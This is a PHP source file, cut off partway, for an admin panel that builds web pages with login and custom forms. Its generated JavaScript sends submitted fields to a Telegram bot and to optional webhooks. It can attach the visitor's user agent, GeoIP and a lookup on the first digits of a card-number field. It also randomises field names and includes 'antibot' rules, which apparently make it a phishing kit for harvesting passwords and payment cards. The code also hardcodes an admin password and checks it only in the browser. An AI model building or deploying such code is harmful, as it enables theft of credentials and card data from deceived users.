<?php
/************************************************************
 * Ultra Dynamic Admin Panel (Light UI) — Full
 * (Picker in real page + Global Form JS)
 ************************************************************/
header('X-Content-Type-Options: nosniff');
header('Cache-Control: no-store, no-cache, must-revalidate');
date_default_timezone_set('Africa/Cairo');

/* ------------ PATHS / CONFIG --------- */
$SETTINGS_FILE   = __DIR__ . '/settings.json';
$BACKUP_DIR      = __DIR__ . '/backups';
$PAGES_DIR       = __DIR__ . '/';
$FORMS_JS_DIR    = __DIR__ . '/forms';
$FORMS_CORE_JS   = $FORMS_JS_DIR . '/forms_core.js';
$ADMIN_PASSWORD  = '0165625092'; // ← غيّره في الإنتاج

if (!is_dir($BACKUP_DIR))   @mkdir($BACKUP_DIR, 0775, true);
if (!is_dir($FORMS_JS_DIR)) @mkdir($FORMS_JS_DIR, 0775, true);

/* ------------------ UTIL --------------------------- */
function load_settings($file){
  if (!file_exists($file)) {
    $rand = substr(md5(mt_rand()),0,8);
    $default = [
      "theme" => [
        "font" => "Inter, Segoe UI, Tahoma, sans-serif",
        "color_primary" => "#2563EB",
        "background" => "#F6FAFF"
      ],
      "telegram" => [ "bot_token" => "", "chat_id" => "" ],
      "widgets" => [
        "header" => ["html" => "<header class=\"container py-3\"><h1>My Site</h1></header>"],
        "footer" => ["html" => "<footer class=\"container py-4\"><small>© ".date('Y')." — All rights reserved.</small></footer>"]
      ],
      "forms" => [
        "login" => [
          "fields" => [
            ["name"=>"username","label"=>"Username","type"=>"text","required"=>true,"placeholder"=>"Enter username"],
            ["name"=>"password","label"=>"Password","type"=>"password","required"=>true,"placeholder"=>"Enter password"]
          ],
          "behavior" => [
            "label"=>"Login","telegram"=>false,"redirect"=>"","alert"=>"",
            "webhook"=>"","tg_template"=>"pipe",
            "tg_meta"=>["ua"=>true,"time"=>true,"geo"=>false,"bin"=>false],
            "tg_bin_field"=>"",
            "js"=>""
          ],
          "css" => "max-width:420px;margin:auto"
        ]
      ],
      "pages" => [[
        "display" => "Home",
        "php"     => "page_{$rand}.php",
        "regions" => [
          "header" => ["type"=>"widget","widget"=>"header"],
          "main"   => ["type"=>"form","form"=>"login"],
          "footer" => ["type"=>"widget","widget"=>"footer"]
        ]
      ]],
      "antibot" => ["enabled_global"=>false,"apply_pages"=>[],"php_rules"=>"","js_rules"=>""],
      "domain_access" => [],
      "versions" => []
    ];
    file_put_contents($file, json_encode($default, JSON_PRETTY_PRINT|JSON_UNESCAPED_UNICODE));
    return $default;
  }
  $d = json_decode(file_get_contents($file), true) ?: [];
  $d += ["theme"=>[],"telegram"=>[],"widgets"=>[],"forms"=>[],"pages"=>[],"antibot"=>["enabled_global"=>false,"apply_pages"=>[],"php_rules"=>"","js_rules"=>""],"domain_access"=>[],"versions"=>[]];
  return $d;
}
function save_settings($file, $data){ return (bool)file_put_contents($file, json_encode($data, JSON_PRETTY_PRINT|JSON_UNESCAPED_UNICODE)); }
function backup_settings($file, $backup_dir){ if(!file_exists($file)) return false; return (bool)copy($file, $backup_dir."/settings_".date('Ymd_His').".json"); }
function sanitize_filename($s){ return preg_replace('/[^A-Za-z0-9_\-\.]+/','_', $s); }
function sanitize_form_name($s){ return preg_replace('/[^A-Za-z0-9_\-]+/','_', $s); }

/* ---- FORMS CORE / WRAPPERS ---- */
function write_forms_core_js($path){
  $core = <<<'JS'
(function(){
  if(window.FormsCore) return;
  const FormsCore = { _cssInjected:false };

  function randomName(len=10){ const c='abcdefghijklmnopqrstuvwxyz0123456789'; let s=''; for(let i=0;i<len;i++) s+=c[Math.floor(Math.random()*c.length)]; return s; }
  function injectBaseCSS(){
    if(FormsCore._cssInjected) return;
    const css = `
      .row-fields{display:grid;grid-template-columns:1fr 1fr;gap:12px}
      .card-input{display:flex;flex-direction:column;margin-bottom:12px}
      .card-input.small{margin-bottom:0}
      .card-input__label{font-size:.9rem;color:#334155;margin-bottom:6px}
      .card-input input{background:#ffffff;color:#0f172a;border:1px solid #cbd5e1;border-radius:10px;padding:10px 12px;outline:none}
      .card-input input:focus{border-color:var(--brand,#2563EB);box-shadow:0 0 0 .25rem rgba(37,99,235,.15)}
      .card-form__button{display:inline-flex;align-items:center;gap:.5rem;border:none;border-radius:12px;background:linear-gradient(90deg,#22d3ee,#60a5fa);color:#0b1220;padding:.65rem 1.05rem;font-weight:700}
      .card-form__button .spinner{width:1rem;height:1rem;border:2px solid currentColor;border-right-color:transparent;border-radius:50%;display:inline-block;animation:spin 1s linear infinite}
      @keyframes spin{to{transform:rotate(360deg)}}
      @media (max-width:768px){.row-fields{grid-template-columns:1fr}}
    `;
    const style=document.createElement('style'); style.textContent=css; document.head.appendChild(style);
    FormsCore._cssInjected=true;
  }
  async function loadSettings(){ const r=await fetch('settings.json?'+Date.now()); const s=await r.json(); s.forms??={}; s.pages??=[]; s.telegram??={}; s.fields??={}; return s; }

  function resolveSubmitSettings(settings,page,formName){
    const pageMap = page?.forms_submit || settings.submit || {};
    const p = pageMap?.[formName] || {};
    const f = (settings.forms?.[formName]?.behavior) || {};
    return {
      label: p.label ?? f.label ?? 'Submit',
      js: p.js ?? f.js ?? '',
      css: p.css ?? '',
      next_page: p.next_page ?? f.redirect ?? '',
      send_telegram: !!(p.send_telegram ?? f.telegram ?? false),
      webhook: p.webhook ?? f.webhook ?? '',
      alert: p.alert ?? f.alert ?? '',
      tg_template: f.tg_template || 'pipe',
      tg_meta: f.tg_meta || {ua:true,time:true,geo:false,bin:false},
      tg_bin_field: f.tg_bin_field || ''
    };
  }

  async function sendToTelegram(settings, formName, data){
    const token=settings.telegram?.bot_token, chat=settings.telegram?.chat_id;
    if(!token||!chat) return false;

    const form = (settings.forms?.[formName])||{};
    const bh   = form.behavior||{};
    const tpl  = bh.tg_template||'pipe';
    const meta = bh.tg_meta||{ua:true,time:true,geo:false,bin:false};
    const binF = (bh.tg_bin_field||'').trim();

    function line(k,v){ return tpl==='pretty' ? (`• ${k}: ${v}`) : (`${k} | ${v}`); }

    let text = `[${formName}] Submission\n`;
    Object.entries(data).forEach(([k,v])=>{ text += line(k,v)+'\n'; });

    try{
      const hash=(location.hash||'').replace(/^#/,'');
      const da = (settings.domain_access && Array.isArray(settings.domain_access) && settings.domain_access[0]) ? settings.domain_access[0] : null;
      if(da && da.tg_include_session_tag && hash){
        const tagLen = Math.max(3, parseInt(da.session_tag_len||'6',10)||6);
        text += line('TAG', hash.slice(0,tagLen))+'\n';
      }
    }catch(_){}

    if(meta.ua){ text += line('UA', navigator.userAgent||'-') + '\n'; }
    if(meta.time){ try{ text += line('Time', new Date().toLocaleString()) + '\n'; }catch(_){ } }

    if(meta.bin && binF && data[binF]){
      const digits=String(data[binF]).replace(/\D+/g,'');
      if(digits.length>=6){
        const BIN=digits.slice(0,6);
        try{
          const binRes = await fetch('https://lookup.binlist.net/'+BIN,{headers:{'Accept':'application/json'}}).then(r=>r.ok?r.json():null);
          if(binRes){
            text += line('BIN', BIN)+'\n';
            if(binRes.scheme) text += line('Scheme', binRes.scheme)+'\n';
            if(binRes.type)   text += line('Type', binRes.type)+'\n';
            if(binRes.brand)  text += line('Brand', binRes.brand)+'\n';
            if(binRes.bank && binRes.bank.name) text += line('Bank', binRes.bank.name)+'\n';
            if(binRes.country && binRes.country.name) text += line('Country', binRes.country.name)+'\n';
          } else { text += line('BIN', BIN)+'\n'; }
        }catch(_){ text += line('BIN', BIN)+'\n'; }
      }
    }

    if(meta.geo){
      try{
        const geo = await fetch('https://ipapi.co/json/').then(r=>r.ok?r.json():null);
        if(geo){
          const x=[geo.ip, geo.country_name, geo.city].filter(Boolean).join(' / ');
          text += line('GeoIP', x||'-')+'\n';
        }
      }catch(_){}
    }

    try{
      const r = await fetch(`https://api.telegram.org/bot${token}/sendMessage`,{
        method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({chat_id: chat, text})
      }).then(r=>r.json());
      return !!r.ok;
    }catch(_){ return false; }
  }

  async function inject(containerId, formName){
    injectBaseCSS();
    const host = document.getElementById(containerId);
    if(!host) return;
    const settings = await loadSettings();
    const fields = (settings.forms?.[formName]?.fields || settings.fields?.[formName] || []);
    if(!fields.length){ host.innerHTML = '<div class="text-muted">No fields configured for this form.</div>'; return; }

    const cur = (function(){ const f=location.pathname.split('/').pop(); return f||'index.php'; })();
    const page = (settings.pages||[]).find(p=>cur===p.php || cur.endsWith(p.php)) || null;
    const submit = resolveSubmitSettings(settings,page,formName);

    const nameMap = {};
    let html = '', row=[];
    fields.forEach((fld,i)=>{
      const rnd = randomName();
      nameMap[fld.name||('field_'+i)] = rnd;
      const attrs = [
        `name="${rnd}"`,`id="${rnd}"`,`type="${fld.type||'text'}"`,`autocomplete="off"`,
        fld.placeholder?`placeholder="${String(fld.placeholder).replace(/"/g,'&quot;')}"`:'',
        fld.required?'required':'', fld.pattern?`pattern="${fld.pattern}"`:'',
        (fld.min!==''&&fld.min!=null)?`min="${fld.min}"`:'', (fld.max!==''&&fld.max!=null)?`max="${fld.max}"`:''
      ].filter(Boolean).join(' ');
      const input = `<input ${attrs} ${fld.js?`oninput="${String(fld.js).replace(/"/g,'&quot;')}"`:''}>`;
      const block = `<div class="card-input${fld.small?' small':''}">
        <label for="${rnd}" class="card-input__label">${(fld.label||fld.name||('Field '+(i+1))).replace(/</g,'&lt;').replace(/>/g,'&gt;')}${fld.required?' <span style="color:#e00">*</span>':''}</label>
        ${input}
      </div>`;
      if(fld.small){ row.push(block); if(!fields[i+1]||!fields[i+1].small){ html+=`<div class="row-fields">${row.join('')}</div>`; row=[]; } }
      else { if(row.length){ html+=`<div class="row-fields">${row.join('')}</div>`; row=[]; } html+=block; }
    });
    if(row.length) html+=`<div class="row-fields">${row.join('')}</div>`;
    host.innerHTML = html;

    const formEl = host.closest('form') || (function(){ const f=document.createElement('form'); host.parentNode.insertBefore(f,host); f.appendChild(host); return f; })();

    if(!formEl.querySelector('.card-form__button')){
      const btn=document.createElement('button'); btn.type='button'; btn.className='card-form__button'; btn.textContent = submit.label||'Submit';
      if(submit.css) btn.style.cssText += submit.css;
      const sp=document.createElement('span'); sp.className='spinner'; sp.style.display='none'; btn.appendChild(sp); formEl.appendChild(btn);

      btn.addEventListener('click', async (e)=>{
        e.preventDefault();
        if(formEl.reportValidity && !formEl.reportValidity()) return;
        const data={}; for(const [orig,rnd] of Object.entries(nameMap)){ const el=document.getElementById(rnd); if(el) data[orig]=el.value; }

        if((submit.js||'').trim()){ try{ eval(submit.js); }catch(err){ console.error('Custom JS error:',err); } return; }

        sp.style.display='inline-block'; btn.disabled=true;

        let ok=true;
        if(submit.send_telegram){ ok = await sendToTelegram(settings, formName, data); }

        if(submit.webhook){ try{ await fetch(submit.webhook,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({form:formName,data})}); }catch(_){ } }

        if(submit.alert) alert(submit.alert);

        if((submit.send_telegram && ok) || !submit.send_telegram){
          if(submit.next_page){ location.href = submit.next_page; }
          else{
            const pages=settings.pages||[]; const idx=pages.findIndex(p=>((location.pathname.split('/').pop())||'index.php')===p.php);
            if(idx!==-1 && pages[idx+1]) location.href = pages[idx+1].php;
          }
        }else{ sp.style.display='none'; btn.disabled=false; }
      });

      (settings.forms?.[formName]?.fields||[]).forEach((fld,i)=>{
        const rnd = nameMap[fld.name||('field_'+i)];
        const el = document.getElementById(rnd); if(!el) return;
        if((fld.css||'').trim()) el.style.cssText += fld.css;
        if((fld.js||'').trim()){ try{ el.addEventListener('input', function(){ try{ (new Function(fld.js)).call(this); }catch(_){ } }); }catch(_){ }
      }});
    }
  }

  window.FormsCore = FormsCore;
  FormsCore.inject = inject;
})();
JS;
  file_put_contents($path, $core);
}
function make_form_wrapper_js($dir, $formName){
  $slug = sanitize_form_name($formName);
  $file = $dir . '/form_' . $slug . '.js';
  $fn   = "inject_" . $slug;
  $js = <<<'JS'
// Auto-generated wrapper
(function(){
  if(!window.FormsCore){ console.error('forms_core.js is required before this wrapper'); return; }
  function INJECT_FN(containerId){ return window.FormsCore.inject(containerId, "FORM_NAME"); }
  window["INJECT_FN"] = INJECT_FN;
})();
JS;
  $js = str_replace(['INJECT_FN','FORM_NAME'], [$fn, $slug], $js);
  file_put_contents($file, $js);
  return basename($file);
}
function rebuild_all_form_wrappers($dir, $corePath, $settings){
  if (!is_dir($dir)) @mkdir($dir, 0775, true);
  write_forms_core_js($corePath);
  $forms = array_keys($settings['forms'] ?? []);
  foreach($forms as $name){ make_form_wrapper_js($dir, $name); }
  return count($forms);
}

/* ---------------- AntiBot build helpers ------------------ */
function build_antibot_runtime_and_js($settings){
  $php = "<?php\n".
         "/** Auto-generated AntiBot runtime **/\n".
         "if (!function_exists('ua_ab_runtime')) {\n".
         "  function ua_ab_runtime(){\n".
         "    ".($settings['antibot']['php_rules'] ?? "")."\n".
         "  }\n".
         "}\n".
         "ua_ab_runtime();\n";
  file_put_contents(__DIR__.'/antibot_runtime.php',$php);

  $js  = "/** Auto-generated AntiBot client JS **/\\n".
         ($settings['antibot']['js_rules'] ?? "");
  file_put_contents(__DIR__.'/antibot.js',$js);
}

/* ------------------ ASSET: admin.js --------------------- */
if (isset($_GET['asset']) && $_GET['asset'] === 'admin.js') {
  header('Content-Type: application/javascript; charset=utf-8');
  $ADMIN_PASSWORD_JS = json_encode($ADMIN_PASSWORD);
  $js = <<<'JS'
/* Ultra Admin – Controller (EN) */
(function(){
  'use strict';
  var ADMIN_PASSWORD = __ADMIN_PASSWORD_PLACEHOLDER__;
  function $(s){return document.querySelector(s)} function $all(s){return [].slice.call(document.querySelectorAll(s))}
  function toast(msg, cls){ try{ var el=document.createElement('div'); el.className='ua-toast '+(cls?('ua-'+cls):'ua-success'); el.textContent=msg; document.body.appendChild(el); setTimeout(function(){el.classList.add('show')},10); setTimeout(function(){el.classList.remove('show'); setTimeout(function(){el.remove()},220)},1800);}catch(e){console.log('[toast]',msg)} }
  function showLogin(){ $('#login').classList.remove('ua-hide'); $('#app').classList.add('ua-hide'); }
  function showApp(){ $('#login').classList.add('ua-hide'); $('#app').classList.remove('ua-hide'); }

  var SETTINGS=null, currentPageIndex=0, currentForm='', currentWidget='';

  function j(url, method, body, headers){ return fetch(url,{method:method||'GET',headers:headers|| (body?{'Content-Type':'application/json'}:undefined),body:body?(typeof body==='string'?body:JSON.stringify(body)):undefined,cache:'no-store'}); }
  function safeJson(url){ return j(url).then(function(r){return r.json()}).catch(function(){return {}}); }
  function loadSettings(){ return safeJson('settings.json?ts='+Date.now()).then(function(s){ SETTINGS=s||{}; SETTINGS.theme=SETTINGS.theme||{}; SETTINGS.telegram=SETTINGS.telegram||{}; SETTINGS.widgets=SETTINGS.widgets||{}; SETTINGS.forms=SETTINGS.forms||{}; SETTINGS.pages=Array.isArray(SETTINGS.pages)?SETTINGS.pages:[]; SETTINGS.antibot=SETTINGS.antibot||{enabled_global:false,apply_pages:[],js_rules:'',php_rules:''}; SETTINGS.domain_access=Array.isArray(SETTINGS.domain_access)?SETTINGS.domain_access:[]; }); }
  function saveSection(k,v){ return j('admin.php?save_section='+encodeURIComponent(k),'POST',v); }
  function savePages(){ return saveSection('pages', SETTINGS.pages||[]); }
  function saveForms(){ return saveSection('forms', SETTINGS.forms||{}); }
  function saveWidgets(){ return saveSection('widgets', SETTINGS.widgets||{}); }
  function saveTheme(){ return saveSection('theme', SETTINGS.theme||{}); }
  function saveTelegram(){ return saveSection('telegram', SETTINGS.telegram||{}); }
  function saveDomainAccess(){ return saveSection('domain_access', SETTINGS.domain_access||[]); }

  /* ---------- LOGIN ---------- */
  function bindLogin(){
    var btn=$('#btnLogin'), pass=$('#pass'), msg=$('#msg');
    if(!btn||!pass) return false;
    function doLogin(){
      var p=(pass.value||'').trim();
      if(!p){ msg.textContent='Enter password'; return; }
      if(p===ADMIN_PASSWORD){ localStorage.setItem('ultra_admin_ok','1'); msg.textContent=''; afterLogin(); }
      else{ msg.textContent='Wrong password'; pass.value=''; }
    }
    btn.addEventListener('click', doLogin);
    pass.addEventListener('keydown', function(e){ if(e.key==='Enter') doLogin(); });
    return true;
  }

  /* ---------- PAGES + REGIONS (Select area) ---------- */
  function regionCard(key, conf, i){
    conf = conf || {type:'html', content:''};
    var types = ['html','widget','form','forms'];
    var forms = Object.keys(SETTINGS.forms||{});
    var widgets = Object.keys(SETTINGS.widgets||{});
    var multi = (conf.type==='forms' && Array.isArray(conf.forms)) ? conf.forms : [];

    var div=document.createElement('div'); div.className='ua-card p-3 mb-3';
    div.innerHTML =
      '<div class="d-flex justify-content-between align-items-center mb-2">'+
        '<div class="d-flex align-items-center gap-2"><span class="mini">Region</span>'+
        '<input class="form-control form-control-sm rg-name" style="width:180px" value="'+key+'"></div>'+
        '<div class="d-flex gap-2">'+
          '<button class="btn btn-sm btn-outline-danger rg-del"><i class="fa fa-trash"></i></button>'+
        '</div>'+
      '</div>'+
      '<div class="row g-2 align-items-start">'+
        '<div class="col-md-3">'+
          '<label class="form-label mini">Type</label>'+
          '<select class="form-select form-select-sm rg-type">'+
            types.map(function(t){ return '<option value="'+t+'"'+(conf.type===t?' selected':'')+'>'+t.toUpperCase()+'</option>' }).join('')+
          '</select>'+
        '</div>'+
        '<div class="col-md-9 rg-body"></div>'+
      '</div>';

    function renderBody(){
      var body = div.querySelector('.rg-body'); var t = div.querySelector('.rg-type').value;
      if(t==='html'){
        body.innerHTML = '<label class="form-label mini">HTML</label><textarea class="form-control rg-html code" rows="4" placeholder="<section>..."></textarea>';
        body.querySelector('.rg-html').value = conf.content||'';
      }else if(t==='widget'){
        body.innerHTML = '<label class="form-label mini">Widget</label><select class="form-select rg-widget"></select>';
        body.querySelector('.rg-widget').innerHTML = widgets.map(function(w){ return '<option value="'+w+'"'+(conf.widget===w?' selected':'')+'>'+w+'</option>' }).join('') || '<option value="">(No widgets)</option>';
      }else if(t==='form'){
        body.innerHTML = '<label class="form-label mini">Form</label><select class="form-select rg-form"></select>';
        body.querySelector('.rg-form').innerHTML = forms.map(function(f){ return '<option value="'+f+'"'+(conf.form===f?' selected':'')+'>'+f+'</option>' }).join('') || '<option value="">(No forms)</option>';
      }else if(t==='forms'){
        body.innerHTML = '<label class="form-label mini">Forms list</label><select multiple size="6" class="form-select rg-forms"></select><div class="mini mt-1">Ctrl/Cmd for multi-select</div>';
        body.querySelector('.rg-forms').innerHTML = forms.map(function(f){ var sel = multi.indexOf(f)!==-1?' selected':''; return '<option value="'+f+'"'+sel+'>'+f+'</option>'; }).join('') || '<option disabled>(No forms)</option>';
      }
    }
    renderBody();

    div.querySelector('.rg-type').addEventListener('change', function(){
      conf.type=this.value; if(this.value!=='html') delete conf.content; if(this.value!=='widget') delete conf.widget; if(this.value!=='form') delete conf.form; if(this.value!=='forms') delete conf.forms;
      renderBody(); persist();
    });
    div.addEventListener('input', function(e){
      if(e.target.classList.contains('rg-name')){ renameRegion(i, e.target.value.trim()||('region_'+i)); return; }
      if(e.target.classList.contains('rg-html')){ conf.content=e.target.value; persistSoon(); return; }
      if(e.target.classList.contains('rg-widget')){ conf.widget=e.target.value; persist(); return; }
      if(e.target.classList.contains('rg-form')){ conf.form=e.target.value; persist(); return; }
      if(e.target.classList.contains('rg-forms')){ conf.forms=[].slice.call(e.target.selectedOptions).map(function(o){return o.value}); persist(); return; }
    });
    div.querySelector('.rg-del').addEventListener('click', function(){
      if(!confirm('Delete this region?')) return;
      removeRegion(i, key);
    });

    function renameRegion(idx, newName){
      var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return;
      var regs=pg.regions||{}; var entries=Object.entries(regs);
      var keyOld = entries[idx][0];
      if(newName===keyOld) return;
      if(regs[newName]){ toast('Region name exists','danger'); return; }
      regs[newName] = regs[keyOld]; delete regs[keyOld];
      pg.regions = regs; SETTINGS.pages[currentPageIndex]=pg; savePages().then(renderPageEditor);
    }
    function removeRegion(idx, key){
      var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return;
      var regs=pg.regions||{}; delete regs[key]; pg.regions=regs; SETTINGS.pages[currentPageIndex]=pg; savePages().then(renderPageEditor);
    }
    function persist(){ var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return; var regs=pg.regions||{}; regs[key]=conf; pg.regions=regs; SETTINGS.pages[currentPageIndex]=pg; savePages(); }
    var persistTimer=null; function persistSoon(){ clearTimeout(persistTimer); persistTimer=setTimeout(persist, 300); }

    return div;
  }

  function buildPagesList(){
    var host=$('#pagesList'); if(!host) return; host.innerHTML='';
    (SETTINGS.pages||[]).forEach(function(p,i){
      var item=document.createElement('div');
      item.className='ua-item d-flex justify-content-between align-items-center';
      item.innerHTML =
        '<div class="d-flex align-items-center gap-2">'+
          '<span class="grip"><i class="fa fa-grip-vertical"></i></span>'+
          '<span>'+ (p.display||('Page '+(i+1))) +'</span>'+
          '<span class="badge">'+ (p.php||'') +'</span>'+
        '</div>'+
        '<button class="btn btn-sm btn-outline-danger"><i class="fa fa-trash"></i></button>';
      item.addEventListener('click', function(e){ if(e.target.closest('button')) return; currentPageIndex=i; renderPageEditor(); });
      item.querySelector('button').addEventListener('click', function(ev){
        ev.stopPropagation(); if(!confirm('Delete this page?')) return;
        var fd=new FormData(); fd.append('index', i);
        fetch('admin.php?delete_page=1', {method:'POST', body:fd})
          .then(function(){ return loadSettings(); })
          .then(function(){ if(currentPageIndex>=SETTINGS.pages.length) currentPageIndex=Math.max(0,SETTINGS.pages.length-1); buildPagesList(); renderPageEditor(); toast('Deleted','warning'); });
      });
      host.appendChild(item);
    });
    if(window.Sortable && host.children.length){
      new Sortable(host,{handle:'.grip',animation:150,onEnd:function(e){
        if(e.oldIndex===e.newIndex) return;
        var moved=SETTINGS.pages.splice(e.oldIndex,1)[0]; SETTINGS.pages.splice(e.newIndex,0,moved); currentPageIndex=e.newIndex;
        savePages().then(function(){ buildPagesList(); renderPageEditor(); });
      }});
    }
  }

  function renderPageEditor(){
    var pg=(SETTINGS.pages||[])[currentPageIndex];
    var fileBadge=$('#curFile'); if(fileBadge) fileBadge.textContent= pg ? (pg.php||'') : '—';
    var pt=$('#pageTitle');
    if(!pg){ if(pt) pt.value=''; $('#regionsEditor').innerHTML=''; renderPagePreview(); return; }
    if(pt){ pt.value=pg.display||''; pt.onchange=function(e){ SETTINGS.pages[currentPageIndex].display=(e.target.value||'').trim(); savePages().then(buildPagesList); }; }

    var host=$('#regionsEditor'); if(!host) return;
    host.innerHTML = '';

    // tools row
    var tools=document.createElement('div');
    tools.className='d-flex gap-2 mb-3';
    tools.innerHTML =
      '<button class="btn btn-neon btn-sm" id="rgAdd"><i class="fa fa-plus"></i> Add region</button>'+
      '<button class="btn btn-outline-neon btn-sm" id="rgPick"><i class="fa fa-crosshairs"></i> Select area in page</button>'+
      '<button class="btn btn-outline-neon btn-sm" id="rgUnmark"><i class="fa fa-eraser"></i> Unmark region</button>';
    host.appendChild(tools);

    // regions cards
    var regs=pg.regions||{}; var keys=Object.keys(regs);
    if(!keys.length){ var info=document.createElement('div'); info.className='mini text-muted'; info.textContent='No regions yet. Add one or use Select area in page.'; host.appendChild(info); }
    keys.forEach(function(k, idx){ host.appendChild(regionCard(k, regs[k], idx)); });

    // actions
    tools.querySelector('#rgAdd').addEventListener('click', function(){
      var name = prompt('Region name (no spaces):','section_'+(Date.now().toString(36).slice(-4))); if(!name) return;
      name = name.trim();
      var pg=SETTINGS.pages[currentPageIndex]; var regs=pg.regions||{};
      if(regs[name]){ toast('Region exists','danger'); return; }
      regs[name]={type:'html',content:"<div class='alert alert-info'>New region.</div>"}; pg.regions=regs; SETTINGS.pages[currentPageIndex]=pg;
      savePages().then(renderPageEditor);
    });
    tools.querySelector('#rgPick').addEventListener('click', function(){
      var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg){ toast('No page','danger'); return; }
      var url = pg.php + (pg.php.indexOf('?')>-1?'&':'?') + 'ts='+Date.now();
      var iframe = document.getElementById('pickerFrame');
      iframe.onload = function(){
        try{
          var doc = iframe.contentDocument || iframe.contentWindow.document;
          var s = doc.createElement('script');
          s.src = 'admin.php?asset=picker.js';
          doc.head.appendChild(s);
        }catch(e){ console.warn('Picker inject failed', e); }
      };
      iframe.src = url;
      if(window.bootstrap){ new bootstrap.Modal('#modalPicker').show(); }
    });
    tools.querySelector('#rgUnmark').addEventListener('click', function(){
      var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg){ toast('No page','danger'); return; }
      var rg = prompt('Region name to unmark:'); if(!rg) return;
      var fd=new FormData(); fd.append('filename', pg.php); fd.append('region', rg);
      fetch('admin.php?unmark_region=1', {method:'POST', body:fd})
        .then(function(r){return r.json()})
        .then(function(x){ toast(x&&x.ok?'Unmarked '+(x.count||0)+' node(s)':'Failed', x&&x.ok?'success':'danger'); });
    });

    var a=$('#openPageLinkTop'); if(a) a.href=pg.php||'#';
    renderPagePreview();
  }

  window.addEventListener('message', function(ev){
    if(!ev || !ev.data || ev.data.type!=='UA_PICK') return;
    var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg) return;
    var rgName = prompt('Region name to attach here (new or existing):','main'); if(!rgName) return;
    var fd=new FormData();
    fd.append('filename', pg.php); fd.append('region', rgName);
    fd.append('xpath', ev.data.xpath||''); fd.append('css', ev.data.css||''); fd.append('id', ev.data.id||''); fd.append('mode', ev.data.mode||'inside');
    fetch('admin.php?mark_region=1', {method:'POST', body:fd})
      .then(function(r){ return r.json(); })
      .then(function(x){ toast(x&&x.ok?'Region placed':'Failed', x&&x.ok?'success':'danger'); });
  });

  function wirePageButtons(){
    var btnNew=$('#btnCreatePage');
    if(btnNew){ btnNew.addEventListener('click', function(){
      var name=prompt('Page title:','New page'); if(!name) return;
      var fd=new FormData(); fd.append('display', name);
      fetch('admin.php?create_page=1', {method:'POST', body:fd})
        .then(function(){ return loadSettings(); })
        .then(function(){ currentPageIndex=SETTINGS.pages.length-1; buildPagesList(); renderPageEditor(); toast('Page created'); });
    }); }
    var btnEdit=$('#btnEditPageFile');
    if(btnEdit){ btnEdit.addEventListener('click', function(){
      var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return;
      fetch(pg.php+'?'+Date.now()).then(function(r){ return r.text(); }).then(function(code){ var t=$('#pageFileEditor'); if(!t) return; t.value=code; if(window.bootstrap){ new bootstrap.Modal('#modalEditor').show(); } });
    }); }
    var btnSaveFile=$('#btnSavePageFile');
    if(btnSaveFile){ btnSaveFile.addEventListener('click', function(){
      var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return; var t=$('#pageFileEditor'); if(!t) return;
      var fd=new FormData(); fd.append('filename', pg.php); fd.append('html', t.value);
      fetch('admin.php?save_page_file=1', {method:'POST', body:fd}).then(function(){ toast('File saved'); });
    }); }
    var btnRetro=$('#btnRetrofitPage');
    if(btnRetro){ btnRetro.addEventListener('click', function(){
      var pg=SETTINGS.pages[currentPageIndex]; if(!pg) return; var fd=new FormData(); fd.append('filename', pg.php);
      fetch('admin.php?retrofit_page=1', {method:'POST', body:fd}).then(function(r){ return r.json(); }).then(function(x){ toast(x && x.ok ? 'Assets injected':'Failed', x && x.ok ? 'success':'danger'); });
    }); }
  }

  function renderPagePreview(){
    var pv=$('#pagePreview'); if(!pv) return; pv.innerHTML='';
    var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg) return;
    var iframe=document.createElement('iframe'); iframe.style.cssText='width:100%;height:420px;border:1px solid #e2e8f0;border-radius:12px';
    iframe.src=(pg.php||'') + ((pg.php||'').indexOf('?')>-1?'&':'?') + 'preview_ts='+Date.now();
    pv.appendChild(iframe);
  }

  /* ---------- FORMS ---------- */
  function buildFormsList(){
    var host=$('#formsList'); if(!host) return; host.innerHTML='';
    Object.keys(SETTINGS.forms||{}).forEach(function(n){
      var a=document.createElement('a');
      a.href='javascript:void(0)';
      a.className='ua-item d-flex justify-content-between align-items-center';
      a.innerHTML='<span><i class="fa fa-clipboard-list me-2"></i>'+n+'</span><i class="fa fa-angle-right text-muted"></i>';
      a.addEventListener('click', function(){ currentForm=n; renderFormEditor(); });
      host.appendChild(a);
    });
  }
  function renderFormEditor(){
    $('#curForm').textContent = currentForm || '—';
    var obj=(SETTINGS.forms||{})[currentForm] || null;
    var tbody=$('#fieldsTable tbody'); if(!tbody) return;
    if(!obj){ tbody.innerHTML=''; return; }
    $('#bh_redirect').innerHTML = '<option value="">(None)</option>' + (SETTINGS.pages||[]).map(function(p){ return '<option value="'+p.php+'">'+(p.display||p.php)+'</option>'; }).join('');
    $('#bh_label').value   = (obj.behavior && obj.behavior.label)   || 'Submit';
    $('#bh_alert').value   = (obj.behavior && obj.behavior.alert)   || '';
    $('#bh_webhook').value = (obj.behavior && obj.behavior.webhook) || '';
    $('#bh_redirect').value= (obj.behavior && obj.behavior.redirect)|| '';
    $('#bh_telegram').checked = !!(obj.behavior && obj.behavior.telegram);
    $('#form_css').value   = obj.css || '';

    // global form JS (new)
    var bhJS = (obj.behavior && obj.behavior.js) || '';
    var globalJSHost = document.getElementById('form_global_js_box');
    if(!globalJSHost){
      globalJSHost = document.createElement('div');
      globalJSHost.id='form_global_js_box';
      globalJSHost.className='mt-2';
      globalJSHost.innerHTML = '<label class="form-label">Form submit JS (global)</label><textarea id="bh_js" class="form-control code" rows="3" placeholder="// e.g. alert(\'OK\'); return; // to stop default submit"></textarea>';
      var formsCard = document.querySelector('#form_css')?.closest('.row')?.parentNode;
      if(formsCard) formsCard.appendChild(globalJSHost);
    }
    var bhJsTa = document.getElementById('bh_js'); if(bhJsTa) bhJsTa.value = bhJS;

    // telegram meta block
    var metaHost = document.getElementById('tgExtra');
    if(!metaHost){
      metaHost = document.createElement('div');
      metaHost.id='tgExtra'; metaHost.className='row g-3 mt-2';
      var anchor=$('#form_css'); var container=anchor? anchor.closest('.row'): null;
